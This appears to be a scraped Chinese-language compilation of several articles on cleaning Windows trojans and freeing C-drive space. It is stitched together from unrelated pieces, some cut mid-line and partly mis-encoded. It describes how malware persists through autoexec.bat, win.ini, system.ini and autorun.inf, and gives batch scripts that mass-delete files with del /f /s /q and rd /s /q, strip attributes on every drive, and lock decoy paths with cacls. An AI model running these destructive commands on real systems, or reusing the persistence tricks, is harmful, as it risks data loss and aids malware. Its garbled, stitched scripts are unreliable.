C盘病毒批处理
系统中木马病毒后的简单解决方法
系统中木马病毒后的简单解决方法系统中木马病毒后该怎么办?下面我们介绍一些简单的解决方法。
1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。
注意在system32目录下的Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。
由于windows 任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。
然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\Program Files、C:\Documents and Settings\user\Local Settings\Temporary Internet Files、C:\Documents and Settings\user\Local Settings\Temp等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。
2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。
根据我的经验,有三种办法供尝试:A.可能是某些木马病毒、流氓软件等注册为系统服务了。
办法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。
再试著中止病毒进程并删除。
B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。
C.使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试著删除病毒进程文件和相应的模块。
(慎用)3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。
一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。
让病毒或木马自动运行的多种技术
网络时代可不太平,谁没有遭遇过病毒或木马?从CIH、I Love You到红色代码、Nimda,从BO到冰河,无一不是网友经常懈逅的对象。
怎么避免这些“艳遇”是广大用户孜孜以求的目标,不过,“道高一尺,魔高一丈”,“防”永远是落后的,主动消灭它们才是积极主动的。
要消灭它们,首先就要掌握病毒及木马是怎么入侵我们的"爱机"的。
有关病毒及木马的入侵招数的文章很多,但都不太全面,编者偶然间发现了一篇作者不详,但内容颇为全面的文章,特意整理出来,希望对大家有所帮助。
一、修改批处理很古老的方法,但仍有人使用。
一般通过修改下列三个文件来作案:Autoexec.bat(自动批处理,在引导系统时执行)Winstart.bat(在启动GUI图形界面环境时执行)Dosstart.bat(在进入MS-DOS方式时执行)例如:编辑C:\windows\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。
二、修改系统配置常使用的方法,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有:在Win.ini文件中:[windows]load=程序名run=程序名在System.ini文件中:[boot]shell=Explorer.exe其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。
三、借助自动运行功能这是黑客最新研发成果,之前该方法不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。
Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容:[autorun]open=Notepad.exe保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。
批处理清除最新病毒
for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%d: dir "%%d:\*.*" /b /ah | find ".inf">>test5.忆林子
shell\open\Command=同目录下的那个隐藏的exe文件名
shell\open\Default=1
shell\explore=资源管理器(^&X)
shell\explore\Command=同目录下的那个隐藏的exe文件名
如果你的情况跟我这里描述的符合的话,那么你可以把下面的 红色代码复制下来,
rem 删除病毒的启动项
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v bjifays /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v hsomklg /f
echo.
echo 该病毒建立的包括的源文件如下:
echo.
echo 病毒文件全路径 大小(字节)
echo C:\Program Files\%test1% 169
C:\Program Files\Common Files\System\ 目录下新建一个 .exe 文件
电脑病毒怎么彻底清理你不知道的8个方法(二)2024
电脑病毒怎么彻底清理你不知道的8个方法(二)引言概述:电脑病毒是当前互联网环境下的一个常见问题。
它们可以对用户的计算机造成严重破坏,如数据丢失、系统崩溃等。
为了彻底清理电脑病毒,我们需要掌握一些有效的方法。
本文列举了8个你可能不知道的方法,希望能帮助你解决电脑病毒问题。
正文:1. 使用可靠的安全软件- 安全软件是保护计算机免受病毒侵害的首要工具。
确保你选择的安全软件是可靠的,并定期更新它,以确保你的计算机始终受到最新的病毒定义文件的保护。
- 可以考虑安装多个安全软件,以增加检测和清理病毒的准确性。
2. 定期进行系统更新- 病毒通常利用操作系统或应用程序的漏洞来入侵计算机。
定期进行系统和软件的更新是防止病毒侵入的重要方法。
- 启用自动更新功能,并确保系统和软件始终保持最新版本。
3. 扫描并清理电子邮件附件- 电子邮件是病毒传播的主要途径之一。
在打开或下载邮件附件之前,务必先进行病毒扫描。
- 如果你收到的邮件来自陌生人或似乎有可疑内容或附件,请谨慎操作,不要随意打开。
4. 谨慎下载和安装软件- 下载和安装来自不受信任的网站或开发者的软件是感染电脑病毒的常见原因之一。
遵循以下几点以降低风险:- 仅从官方或受信任的来源下载软件。
- 阅读其他用户的评价和评论,并查找软件的信誉度。
- 在安装过程中仔细阅读并了解软件的许可和协议。
5. 删除已感染的文件和程序- 如果你确定某个文件或程序已感染病毒,立即将其删除。
这有助于阻止病毒进一步传播,并减少系统被破坏的风险。
- 同时,要确保文件和程序被完全删除,以防止病毒重新激活。
总结:彻底清理电脑病毒是我们保护计算机安全的重要任务。
通过使用可靠的安全软件、定期进行系统更新、扫描并清理电子邮件附件、谨慎下载和安装软件,以及删除已感染的文件和程序,我们可以有效地应对电脑病毒问题。
遵循这8个方法,你将更好地保护你的计算机免受病毒侵害。
批处理脚本自动清理Windows临时安装文件夹
批处理脚本自动清理Windows临时安装文件夹随着时间的推移和软件的安装卸载,Windows系统中的临时安装文件夹会逐渐积累,占据硬盘空间,影响系统运行速度和稳定性。
为了解决这个问题,我们可以编写一个批处理脚本,自动清理Windows临时安装文件夹,提高系统性能。
步骤一:创建批处理脚本文件首先,我们需要创建一个文本文件,后缀改为.bat,例如"clean_temp.bat"。
然后,将以下代码复制到文本文件中:@echo offecho 正在清理临时文件夹...echo 请稍等...RD /S /Q "%temp%\*"RD /S /Q "%windir%\Temp\*"echo 清理完成!pause步骤二:保存并运行批处理脚本文件保存好批处理脚本文件后,双击运行它。
此时,系统会自动执行脚本中的命令。
步骤三:清理临时安装文件夹批处理脚本会自动清理Windows系统中的两个临时安装文件夹:%temp%和%windir%\Temp。
这两个文件夹是系统默认的临时文件夹,在这里存储着软件安装时产生的临时文件。
使用RD命令,带上参数/S /Q可以删除文件夹及其所有子文件夹和文件,并且不需要用户进行确认。
清理完成后,批处理脚本会显示"清理完成!"的提示信息,并暂停,等待用户按下任意键关闭窗口。
需要注意的是,批处理脚本会将这两个临时文件夹完全清空,所以请确保在执行脚本之前,已保存好需要保留的文件。
步骤四:将批处理脚本设置为定时任务如果希望定期清理临时安装文件夹,我们可以将批处理脚本设置为Windows的定时任务。
1. 打开"任务计划程序",在左侧面板中点击"创建任务"。
2. 在"常规"选项卡中,填写任务的名称和描述。
3. 切换到"触发器"选项卡,点击"新建"创建新的触发器。
清理C盘系统垃圾文件-批处理方式
清理C盘系统垃圾⽂件-批处理⽅式 很多时候安装软件越来越多,部分软件产⽣的临时⽂件、垃圾⽂件常常存在于C盘系统盘中;⽇积夜累直接导致可⽤的系统盘空间越来越⼩,直到没有多余的空间为⽌,最后可能的结果是系统异常、软件⽆法正常运⾏;此时可以通过其他第三⽅软件⼯具或杀毒、安全卫⼠之类的清理⽐较全⾯或者重新安装操作系统,不过这样也会⾮常⿇烦,此后还需要安装各种必要的软件、配置之类的;有时候为了⽅便不⽤安装其他软件即可清理,通过以下批处理clear.bat,可以较为⽅便的清理⼤部分垃圾或临时缓存⽂件,批处理内容如下: echo "正在清理系统垃圾与临时⽂件,请稍等......." del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %systemdrive%\recycled\*.* del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\temp del /f /q %userprofile%\cookies\*.* del /f /q %userprofile%\recent\*.* del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" del /f /s /q "%userprofile%\Local Settings\Temp\*.*" del /f /s /q "%userprofile%\recent\*.*以上保存为clear.bat,放置在任何⽅便的位置皆可(除了以上罗列的路径下O(∩_∩)O~),需要清理的时候,双击执⾏该批处理⽂件,等候稍许即可。
文件夹exe病毒的解决办法
文件夹exe病毒的解决办法遇到此病毒不用太慌张,我们先通过如下方式来查看我们的原文件,并尽量先将其作好备分。
其实原文件是被篡改属性后被隐藏起来了,通过如下几种方式来查找原文件。
工具→文件夹选项→查看→勾选"显示所有文件和文件夹"→确定,就能查看到了真正被隐藏了的原文件,如下组图所示。
第二种方式是通过命令提示符还原原文件属性,运行"cmd"命令,转至相应盘符,使用"dir /a"命令查看被隐藏文件,并使用"attrib"命令来恢复文件属性,如下组图所示。
进入病毒感染盘符查看隐藏了的原文件原文件和伪装的病毒文件对比使用本命令并加相关参数恢复文件属性,"***"代表要恢复的文件第三种方式可以用一个bat文件来恢复,复制代码到记事本,保存为.bat文件即可,这个bat文件的代码如下。
echo.::::::::::::::::::::::::::::::::::::::::::::::::::::::@echo::正在还原你的文件,请稍侯......@echo::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::FOR %%a IN ( c: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U:V: W: X: Y: Z: ) DO ATTRIB -H -S %%a\*.* /s /dATTRIB -H -S "%userprofile%\桌面\*.*" /s /dATTRIB -H -S "%userprofile%\My Documents\*.*" /s /dping -n 120 localhostFOR %%a IN ( C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) DO del %%a\看一看.txtdel "%userprofile%\桌面\看一看.txt"del "%userprofile%\My Documents\看一看.txt"color 4Fcolor 0Ccolor 4Fcolor 0Ccolor 4Fcolor 0C@echo 文件已还原!@pause也可以到这里下载,Exe.bat>>作了如上操作之后,回到盘符根目录,作好原文件的备份后(当然,这样操作是为了万无一失),可以直接删掉病毒文件,如下图以".exe"结尾的所有感染文件。
电脑C盘中病毒怎么办
电脑C盘中病毒怎么办
很多人在C盘中毒出现无法开机或者电脑操作异常的时候,都会选择给电脑重装系统,但是如此一来,电脑C盘的重要文件和桌面文件肯定就丢失了,其实有更好的办法可以解决,下面就让店铺给大家说一下电脑C盘中病毒怎么办吧。
电脑C盘中病毒的查杀方法
进入安全模式
如果电脑中了病毒无法开机了,我们需要先进入电脑的安全模式,在电脑开机的时候不停按F8
然后电脑会弹出一个进入安全模式的菜单,然后从中选择【安全模式】或者【网络安全模式】都可以
进入电脑安全模式后,如果电脑上有杀毒软件就打开杀毒软件进行病毒查杀,如果没有就下载杀毒软件
查杀C盘病毒
打开电脑上面的杀毒软件,以电脑管家为例,打开后选择【病毒查杀】这个功能点击打开
打开病毒查杀功能后,先点击旁边的杀毒引擎打开,然后再去点击右上角的杀毒模式
选择好杀毒模式后,直接点击一下,就可以开始自动查杀木马病毒了,等待检测完病毒后,直接把病毒清理掉即可。
如何清理电脑病毒
如何清理电脑病毒在如今数字化时代,电脑病毒成为我们日常生活中常见的问题之一。
电脑病毒可以造成个人隐私泄露、系统崩溃以及信息丢失等严重后果。
因此,了解如何清理电脑病毒是非常重要的。
本文将介绍一些常见的、有效的电脑病毒清理方法。
病毒扫描软件病毒扫描软件是最常见、最有效的清理电脑病毒的方法之一。
市面上有许多免费或付费的病毒扫描软件可供选择。
在清理电脑病毒之前,我们首先需要下载并安装一个病毒扫描软件。
安装完成后,确保软件处于最新版本,并进行全盘扫描。
病毒扫描软件将会检测系统中的病毒,并提供清理选项。
安全模式扫描如果我们的电脑受到病毒感染,有时候病毒会阻碍病毒扫描软件的正常运行。
这时,我们可以尝试在安全模式下进行扫描和清理。
在大多数Windows系统中,我们可以通过在系统启动时按下F8键来进入安全模式。
在安全模式下,只加载系统必需的驱动程序和服务,从而减少病毒的干扰。
在安全模式下,运行病毒扫描软件,以清除病毒。
切勿点击可疑链接或下载附件病毒通常通过电子邮件、社交媒体和网络下载等途径传播。
为了避免电脑感染病毒,我们应该避免点击可疑的链接或下载不明附件。
有时候,病毒会伪装成看似合法的链接或附件,欺骗用户点击并下载,从而引发感染。
因此,我们要保持警惕,在不确定的情况下,避免点击链接或下载附件,这是预防电脑病毒非常重要的一点。
定期更新操作系统和软件定期更新操作系统和软件是预防电脑病毒感染的关键措施之一。
操作系统和软件的更新通常包括补丁和安全性更新,可以修复已知的漏洞并提高系统的安全性。
我们应该定期检查操作系统和软件的更新,并及时安装。
更新后的系统和软件通常具备更好的抵御病毒攻击的能力,从而减少电脑感染病毒的风险。
备份重要数据当电脑感染病毒时,我们的数据可能会因此丢失或被损坏。
为了最大程度地减少数据丢失的风险,在电脑中保存重要的文件和数据之前,我们应该定期备份数据。
备份可以通过外部硬盘、云存储等方式进行。
当电脑感染病毒时,我们可以通过清理病毒后恢复数据,而不会遭受数据丢失的风险。
推荐几款清理软件,帮你腾出C盘空间
推荐⼏款清理软件,帮你腾出C盘空间Windows系统在长期的实⽤过程中,会使C盘的剩余容量越来越⼩,众多冗余垃圾⽂件,⼤量缓存⽂件等都会使系统运⾏变得缓慢,这⾥给⼤家推荐⼏款⼗分好⽤的清理⼩软件。
(ps 微软官⽅曾经说过不推荐使⽤第三⽅清理软件清理系统,⾃然Windows系统⾃带了清理系统的功能,但似乎效果不明显,⽹上也有很多批处理⽂件清理垃圾⽂件,⼤家可以⽹上搜搜,这⾥就不讨论了,另外也有C盘拓容量的⽅法,这⾥也不讨论)ccleaner——国外专业的C盘清理软件,⼗分⼩巧,没有多余的功能,没有⼴告,有免费版体验,⽹上也有专业版的激活码可以使⽤,界⾯较为简洁,清理能⼒也不错,尤其是清理注册表功能清理的很彻底,还可以卸载微软Windows 10系统内置的应⽤,清理浏览器插件等,还拥有主动清理功能,⾃动帮你清理垃圾⽂件。
cleanmaster(软煤清理⼤师)——原软媒魔⽅的⼀个组件,现单独推出绿⾊版,免安装,除了⼀般清理软件拥有的⼀般清理,隐私清理功能外,还有深度清理和系统瘦⾝功能,前者清理更为彻底,后者可以清除系统字体,系统更新⽂件等。
由于其相当于单独的⼀个组件,也没有多余的功能,简洁⼩巧。
DriverStore Explorer——专门清理系统⽼旧驱动,Windows系统在更新驱动时,将驱动释放到DriverStore⽂件夹中,并不会清除他们,⽽是为了回滚操作将它们保留了下来,时间⼀久就会在DriverStore⽂件夹中存有⼤量⽼旧的驱动⽂件,这么⼀款专业的驱动清理软件就能帮你清除他们(⼀般不建议⼤家清除,实在没办法了可以试试)。
以上介绍的三款清理软件⼏乎包含了所有清理软件的功能,其他清理软件功能也都⼤同⼩异,并且这三款都没⼴告,没有流氓操作,⽤户体验较好。
⼤家都⽤什么清理软件呢,欢迎留⾔讨论,分享分享。
文件夹exe病毒解决方法
文件夹exe病毒解决方法
解决文件夹exe病毒的方法如下:
1. 使用安全软件:安装一款可信的杀毒软件,并经常更新病毒库。
运行全盘扫描,杀掉并删除电脑中的exe病毒文件。
2. 手动删除:进入任务管理器,关闭所有可疑的exe进程。
然后,使用文件管理器,找到感染的文件夹,将其中的可疑exe
文件删除。
同时,清空回收站。
3. 系统恢复:如果杀毒软件无法清除病毒,可以尝试系统恢复。
选择一个可以信任的还原点,将计算机恢复到该日期之前的状态。
4. 更新操作系统和软件:经常更新操作系统和软件是防止病毒感染的重要步骤。
及时安装最新的安全补丁,可以阻止已知的安全漏洞。
5. 谨慎打开附件和链接:避免打开来自不信任来源的附件和链接,以防止病毒通过电子邮件或恶意网站传播。
6. 备份重要文件:定期备份重要的文件和数据,确保它们不会因病毒攻击而丢失。
7. 防火墙设置:启用防火墙可以阻止不明来源的网络连接,加强计算机的安全性。
8. 启用实时保护:将杀毒软件的实时保护功能打开,可以在电脑运行时即时检测和拦截病毒。
9. 尽量避免使用盗版软件:盗版软件往往存在安全隐患,容易被病毒利用。
请注意以上解决方法仅供参考,在操作过程中请谨慎,并确保备份重要文件。
批处理清除setuprs1病毒
批处理清除setuprs1病毒.txt什么叫乐观派?这个。
就象茶壶一样,屁股被烧得红红的,还有心情吹口哨。
生活其实很简单,过了今天就是明天。
一生看一个女人是不科学的,容易看出病来。
批处理清除setuprs1病毒批处理清除setuprs1病毒文章转自:忆林子病毒产生的源文件runauto..,lsass.exe,setuprs1。
这个病毒比较特殊,因为命令提示符被病毒关联了,所以在把以下代码另存为.bat后,双击是不能运行的,请找到你自己电脑上c:\windows \system32\cmd.exe这个文件,把这个文件复制到桌面上,改名为test.exe然后双击test.exe,然后把保存的.bat文件拖到这个黑色窗口中,回车就可以了.@echo offtitle 忆林子color 0aecho ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓echo 病毒说明echo 该病毒会在C:\windows\ 目录下建立以下文件echo cmd.exe.exe,lsass.exe,setuprs1.pifecho 然后在每个盘建立autorun.inf 和runauto..文件echo autorun.inf这个文件用文本编辑器打开后的代码是echo [AutoRun]echo open=RUNAUT~1\autorun.pifecho shell\1=打开(&O)echo shell\1\Command=RUNAUT~1\autorun.pifecho shell\2\=浏览(&B)echo shell\2\Command=RUNAUT~1\autorun.pifecho shellexecute=RUNAUT~1\autorun.pifecho 这个inf文件就是用来再次引发在runauto..目录下的autorun.pifecho 这个病毒文件的,并且因为当用户用右键打开盘符时看到的第一项是echo “打开”,所以用户根本不会怀疑自己的电脑已经中了这个病毒了。
电脑病毒怎么彻底清理你不知道的8个方法(一)
电脑病毒怎么彻底清理你不知道的8个方法(一)引言概述:随着科技的不断发展,电脑病毒已经成为我们生活中不可避免的问题之一。
这些恶意软件会给我们的电脑带来各种问题和隐患,因此,彻底清理电脑病毒是非常重要的。
然而,很多人并不清楚如何有效地清理电脑病毒。
在本文中,我们将介绍8个方法来帮助你彻底清理电脑病毒。
正文:一、安全模式下运行杀毒软件1.进入安全模式:重启电脑,在系统启动时按下F8键,选择安全模式启动。
2.选择可信赖的杀毒软件:确保安装了一款可信赖的杀毒软件,并及时更新病毒库。
3.全盘扫描:在安全模式下运行杀毒软件,进行全盘扫描,清理电脑内的病毒。
二、使用在线病毒扫描工具1.选择可靠的在线病毒扫描工具:有许多在线病毒扫描工具可供选择,如Kaspersky、McAfee等。
2.上传并扫描文件:将怀疑感染病毒的文件上传到在线扫描工具中进行扫描。
3.清理感染文件:根据扫描结果,清理被感染的文件。
三、清理浏览器扩展和插件1.打开浏览器设置:在浏览器中打开设置页面。
2.管理扩展和插件:找到扩展和插件管理选项。
3.禁用或删除可疑扩展和插件:禁用或删除浏览器中的可疑扩展和插件。
四、更新操作系统和软件1.及时更新操作系统:保持操作系统始终更新到最新版本,以获得最新的安全补丁。
2.更新软件:更新常用软件,如浏览器、杀毒软件等,以修复安全漏洞。
五、备份重要文件并恢复到出厂设置1.备份重要文件:将重要文件备份到外部存储设备中。
2.恢复到出厂设置:重新安装操作系统,将电脑恢复到出厂设置。
3.还原备份文件:将备份的重要文件还原到电脑中。
总结:清理电脑病毒是电脑维护的重要一环,采取适当的方法可以帮助我们彻底清理电脑中的病毒。
在本文中,我们介绍了在安全模式下运行杀毒软件、使用在线病毒扫描工具、清理浏览器扩展和插件、更新操作系统和软件、备份重要文件并恢复到出厂设置等八个方法。
通过有效的清理方法,我们可以保证电脑的安全和稳定运行。
在下一篇文章中,我们将继续介绍电脑病毒的清理方法(二)。
电脑中病毒后的清除方法
电脑中病毒后的清除方法在使用电脑的过程中,我们经常会遇到病毒感染的问题。
电脑中的病毒不仅会导致系统崩溃、文件丢失,还会危及我们的隐私和数据安全。
因此,了解电脑中病毒后的清除方法是至关重要的。
本文将介绍几种常见的电脑病毒清除方法,帮助您有效地解决这一问题。
方法一:安装杀毒软件要彻底清除电脑中的病毒,最常见的方法就是安装杀毒软件。
杀毒软件可以有效地检测和清除病毒,同时提供实时保护功能,阻止病毒进入您的电脑。
市面上有很多知名的杀毒软件可供选择,如卡巴斯基、诺顿等。
在安装杀毒软件之后,及时更新病毒库,保持软件的最新版本,以提高病毒识别和清除能力。
方法二:扫描和清除病毒当杀毒软件安装完成并更新到最新版本后,我们可以进行全盘扫描来寻找和清除电脑中的病毒。
打开杀毒软件,选择“全盘扫描”选项,点击开始扫描。
整个过程可能需要一段时间,取决于您的电脑硬盘容量和文件数量。
一旦扫描完成,杀毒软件会列出所有检测到的病毒,并提供相应的清除选项。
请务必选择“清除”或“删除”选项,以确保病毒被永久删除。
方法三:更新操作系统和软件经常更新操作系统和软件也是清除电脑中病毒的重要步骤。
更新操作系统可以修复系统漏洞,提高系统的安全性。
同时,更新常用软件如浏览器、办公软件等,可以弥补软件中的安全漏洞,减少受到病毒攻击的风险。
大多数操作系统和软件都提供自动更新功能,您只需打开相应的设置,并勾选自动更新选项即可。
方法四:定期备份重要数据病毒感染可能导致数据丢失或损坏,因此定期备份重要数据是非常必要的。
备份可以将您的重要文件复制到外部存储设备或云存储空间中,这样即使遭受病毒攻击,您的数据也能安全存储。
您可以选择每周、每月或者每季度备份一次,根据数据重要性和频繁程度来灵活安排备份计划。
方法五:谨慎浏览和下载最后一个方法是谨慎浏览和下载。
电子邮件附件、下载软件和浏览未知网站时潜在的风险最大。
不要打开您不认识或者怀疑来源的邮件附件,确保从可信的官方网站下载软件,避免访问未知、怀疑的网站。
一个批处理让你的电脑免疫所有木马病毒
一个批处理让你的电脑免疫所有木马病毒为了编写这这个批处理程序,本人整整研究了1个多星期,终于完成了,给大家分享。
不发附件,我要的是让大家都可以分享这个好程序。
我把原代码发上来!觉得的好的,只需要帮我顶下帖子就行!谢谢!!@echo offcolor 0aecho******************************************************************* ***********echo * *echo * 现在进行机器狗免疫 *echo * *echo******************************************************************* ***********md C:\WINDOWS\system32\wxptdi.sys 2>nulmd C:\WINDOWS\system32\wxptdi.sys\1..\ 2>nulmd C:\WINDOWS\system32\fat32.sys 2>nulmd C:\WINDOWS\system32\fat32.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\ati32srv.sys 2>nulmd C:\WINDOWS\system32\drivers\ati32srv.sys\1..\ 2>nul md C:\WINDOWS\system32\drivers\pcibus.sys 2>nulmd C:\WINDOWS\system32\drivers\pcibus.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\pcidisk.sys 2>nulmd C:\WINDOWS\system32\drivers\pcidisk.sys\1..\ 2>nul md C:\WINDOWS\system32\drivers\pcihdd.sys 2>nulmd C:\WINDOWS\system32\drivers\pcihdd.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\phy.sys 2>nulmd C:\WINDOWS\system32\drivers\phy.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\pop.sys 2>nulmd C:\WINDOWS\system32\drivers\pop.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\puid.sys 2>nulmd C:\WINDOWS\system32\drivers\puid.sys\1..\ 2>nulmd C:\WINDOWS\system32\drivers\usb32k.sys 2>nulmd C:\WINDOWS\system32\drivers\usb32k.sys\1..\ 2>nul md C:\WINDOWS\system32\2dogkiller.sys 2>nulmd C:\WINDOWS\system32\2dogkiller.sys\1..\ 2>nulattrib C:\WINDOWS\system32\wxptdi.sys +s +h +r +a 2>nul attrib C:\WINDOWS\system32\fat32.sys +s +h +r +a 2>nul attrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcidisk.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcihdd.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\phy.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pop.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\usb32k.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\2dogkiller.sys +s +h +r +a 2>nulattrib C:\WINDOWS\system32\drivers\pcibus.sys +s +h +r +a 2>nulecho y|cacls C:\WINDOWS\system32\2dogkiller.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\usb32k.sys /d everyone2 >nulecho y|cacls C:\WINDOWS\system32\drivers\puid.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pop.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\phy.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcihdd.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcidisk.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\pcibus.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\drivers\ati32srv.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\fat32.sys /d everyone 2>nulecho y|cacls C:\WINDOWS\system32\wxptdi.sys /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行机器狗小马免疫 *echo * *echo******************************************************************* **************md c:\windows\system32\bqtldzlu.exe 2>nulmd c:\windows\system32\diynpis.exe 2>nulmd c:\windows\system32\dndsioc.exe 2>nulmd c:\windows\sytem32\fewqickd.exe 2>nulmd c:\windows\sytem32\fmschif.exe 2>nulmd c:\windows\sytem32\fmsjhif.exe 2>nulmd c:\windows\sytem32\hefcndy.exe 2>nulmd c:\windows\sytem32\hgeazpkc.exe 2>nulmd c:\windows\sytem32\anistio.exe 2>nulmd c:\windows\sytem32\anittio.exe 2>nulmd c:\windows\sytem32\isndctio.exe 2>nulmd c:\windows\sytem32\juejwcx.exe 2>nulmd c:\windows\sytem32\nbnwewd.exe 2>nulmd c:\windows\sytem32\ptshell.exe 2>nulmd c:\windows\sytem32\uiwcaqws.exe 2>nulmd c:\windows\sytem32\wipxcdec.exe 2>nulmd c:\windows\sytem32\wrew2ds.exe 2>nulmd c:\windows\system32\ytewcxzsw.exe 2>nulattrib c:\windows\system32\bqtldzlu.exe +s +r +h +a 2>nul attrib c:\windows\system32\diynpis.exe +s +r +h +a 2>nul attrib c:\windows\system32\dndsioc.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fewqickd.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fmschif.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\fmsjhif.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\hefcndy.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\hgeazpkc.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\anistio.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\anittio.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\isndctio.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\juejwcx.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\nbnwewd.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\ptshell.exe +s +r +h +a 2>nulattrib c:\windows\sytem32\uiwcaqws.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\wipxcdec.exe +s +r +h +a 2>nul attrib c:\windows\sytem32\wrew2ds.exe +s +r +h +a 2>nul attrib c:\windows\system32\ytewcxzsw.exe +s +r +h +a 2>nulecho y|cacls c:\windows\system32\bqtldzlu.exe /d everyone 2>nulecho y|cacls c:\windows\system32\diynpis.exe /d everyone 2>nulecho y|cacls c:\windows\system32\dndsioc.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fewqickd.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fmschif.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\fmsjhif.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\hefcndy.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\hgeazpkc.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\anistio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\anittio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\isndctio.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\juejwcx.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\nbnwewd.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\ptshell.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\uiwcaqws.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\wipxcdec.exe /d everyone 2>nulecho y|cacls c:\windows\sytem32\wrew2ds.exe /d everyone 2>nulecho y|cacls c:\windows\system32\ytewcxzsw.exe /d everyone 2>nulecho*********************************************************************************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 进行Auto免疫 *echo * *echo******************************************************************* **************for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%a:\auto.exe >nul 2>nulfor %%h in 